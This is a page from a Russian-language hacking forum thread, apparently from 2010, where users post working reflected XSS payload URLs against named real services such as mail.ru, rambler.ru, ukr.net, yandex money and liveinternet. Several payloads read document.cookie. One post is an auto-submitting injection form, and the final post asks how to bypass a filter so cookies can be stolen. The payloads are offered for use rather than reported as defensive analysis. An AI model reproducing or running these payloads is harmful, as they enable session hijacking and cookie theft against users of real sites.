HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Пассивные xss на почтовых серверах
   
Ответ
Страница 14 из 25 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.05.2010, 01:13
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
С нами: 9112381

Репутация: 403
По умолчанию
Код:
http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>
Код:
http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Ruslan1817; 20.05.2010 в 01:55..
 
Ответить с цитированием

liveinternet
  #2  
Старый 23.05.2010, 18:16
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами: 8463290

Репутация: 81
По умолчанию liveinternet
liveinternet
PHP код:
<body onload="document.UsrSrchImportFormSrch.submit();">
<form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');"
              <input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' /> 
              <input class="Hi" type="submit" value="Искать!" />
              </form>    
</body
Последний раз редактировалось life_glider; 24.05.2010 в 06:08..
 
Ответить с цитированием

  #3  
Старый 24.05.2010, 16:24
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами: 8463290

Репутация: 81
По умолчанию
http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519
 
Ответить с цитированием

  #4  
Старый 25.05.2010, 01:06
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
С нами: 9112381

Репутация: 403
По умолчанию
Код:
http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') />
 
Ответить с цитированием

  #5  
Старый 11.06.2010, 18:35
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
С нами: 9132514

Репутация: 41
По умолчанию
http://maps.mail.ru

В строке поиска:
Код:
' onMouseOver='alert(1)'>
и "Найти"



kards.qip.ru
В любых комментариях в login/pass вставляем
Код:
"><img src='.' onerror='alert()'>
И нажимаем "Добавить комментарий"
Последний раз редактировалось BlackFan; 14.06.2010 в 16:03..
 
Ответить с цитированием

  #6  
Старый 05.07.2010, 17:49
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
С нами: 9132514

Репутация: 41
По умолчанию
http://rabota.mail.ru

Код:
http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba='
crackmail: не пашет.

пффф, уже пофиксили
 
Ответить с цитированием

  #7  
Старый 24.08.2010, 13:21
BluR
Познающий
Регистрация: 06.08.2009
Сообщений: 56
С нами: 8823864

Репутация: 29
По умолчанию
money.yandex.ru

https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//-->alert(document.cookie)
 
Ответить с цитированием

  #8  
Старый 15.09.2010, 16:38
satana666
Новичок
Регистрация: 10.04.2009
Сообщений: 27
С нами: 8992864

Репутация: 30
По умолчанию
rambler.ru

Вроде ещё не выкладывали.

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//horoscopes.rambler.ru/names.html?words=">alert('XSS')[/COLOR][/COLOR] 
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//dating.meta.ua/search.php?action=search&min_age=">alert(/XSS/)[/COLOR][/COLOR] 
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//index.online.ua/?cx=&q=">alert('XSS')[/COLOR][/COLOR] 
ukr.net

Не знаю выкладывали или нет, гугл не ответил точно.

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//freemail.ukr.net/q/reg?name=">alert('XSS')[/COLOR][/COLOR] 
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kino.ukr.net/subscribe/email%3D%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E[/COLOR][/COLOR] 
 
Ответить с цитированием

  #9  
Старый 01.10.2010, 21:46
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
mail.ru

Парочка пассивных xss на форумах mail.ru

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//forum.lady.mail.ru/topic.html?fid=22&tid=28428&sub=6964&old_pg=&old_id=alert("xss")[/COLOR][/COLOR] 
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//forum.health.mail.ru/topic.html?fid=114&tid=2137&sub=%3Cscript%3Ealert(%22xss%22)%3C/script%3E[/COLOR][/COLOR] 
 
Ответить с цитированием

  #10  
Старый 19.10.2010, 08:38
satana666
Новичок
Регистрация: 10.04.2009
Сообщений: 27
С нами: 8992864

Репутация: 30
По умолчанию
Пасcивка на mail.ru

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//starlook.lady.mail.ru/commented?">alert('XSS')[/COLOR][/COLOR] 
Вот только в alert(document.cookie) точка заменяется на _

Это можно как-нибудь обойти?
 
Ответить с цитированием
Ответ
Страница 14 из 25 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...